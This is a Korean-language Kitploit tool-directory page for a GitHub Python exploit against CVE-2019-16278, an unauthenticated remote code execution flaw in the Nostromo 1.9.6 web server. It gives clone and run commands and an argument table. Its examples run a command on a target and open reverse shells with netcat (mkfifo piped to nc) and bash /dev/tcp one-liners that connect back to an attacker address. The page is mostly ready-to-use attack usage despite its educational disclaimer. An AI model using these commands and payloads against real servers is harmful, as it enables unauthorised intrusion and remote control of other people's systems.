Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/cybermonkx/cve-2019-16278_nostromo-1.9.6---remote-code-execution
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingPayload Development
GitHubcybermonkx/cve-2019-16278_nostromo-1.9.6---remote-code-execution

CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution

인증되지 않은 공격자는 URL 검증 실패로 인해 서버가 '/bin/sh'와 같은 셸 파일을 가리키도록 강제하고, 시스템에 존재하는 임의의 파일로 경로 탐색(path traversal)이 가능해져 임의의 명령을 실행할 수 있습니다. Nostromo 1.9.6과 같은 버전은 이 URL을 검증하지 못합니다.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
1년 전아직 검토되지 않음

POC

저장소: https://github.com/CybermonkX/CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution.git

📜 설명

이 저장소에는 Nostromo 1.9.6(웹 서버)의 취약점인 CVE-2019-16278에 대한 Python 익스플로잇이 포함되어 있습니다. 이 취약점은 디렉터리 트래버설을 악용하여 대상 시스템에서 임의의 명령을 실행함으로써 **원격 코드 실행(RCE)**을 가능하게 합니다.

🚀 기능

  • 취약한 대상에서 사용자 지정 셸 명령을 실행합니다.
  • 리버스 셸 페이로드를 지원합니다.
  • 대상으로부터 수신할 응답의 크기를 사용자 지정할 수 있습니다.

🛠️ 요구 사항

  • Python 3.x
  • Nostromo 1.9.6이 실행 중인 시스템(취약한 대상).
  • 리버스 셸을 잡기 위한 Netcat(nc).

⚙️ 사용법

1단계: 저장소 클론

root@kitploit:~
git clone https://github.com/CybermonkX/CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution.git
cd CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution

2단계: 익스플로잇 실행

root@kitploit:~
python3 CVE-2019-16278.py -t <TARGET_IP> -p <PORT> -c "<COMMAND>" [-b <BYTES_TO_READ>]

인자:

🧑‍💻 예제

예제 1: 대상에서 whoami 실행

root@kitploit:~
python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "whoami"

예제 2: Netcat을 사용한 리버스 셸

1단계: 공격 머신에서 Netcat 리스너를 시작합니다:

root@kitploit:~
nc -lvnp 443

2단계: 리버스 셸 페이로드로 익스플로잇을 실행합니다:

root@kitploit:~
python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.16.5 443 > /tmp/f"

예제 3: /dev/tcp를 사용한 리버스 셸

root@kitploit:~
python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "bash -i >& /dev/tcp/10.10.16.5/443 0>&1"

🔍 취약점 세부 정보

  • CVE: CVE-2019-16278
  • 영향을 받는 소프트웨어: Nostromo 1.9.6 웹 서버
  • 유형: 디렉터리 트래버설 -> 원격 코드 실행

⚠️ 면책 조항

이 도구는 교육 목적으로만 제공됩니다. 소유하지 않았거나 테스트에 대한 명시적 허가를 받지 않은 시스템에서 사용하지 마십시오. 시스템에 대한 무단 액세스는 불법입니다. 책임 있게 사용하십시오.

도구 다운로드
인자설명필수기본값
-t, --target대상 IP 주소예없음
-p, --port대상 포트예없음
-c, --command서버에서 실행할 명령예없음
-b, --bytes응답에서 읽을 바이트 수아니요4096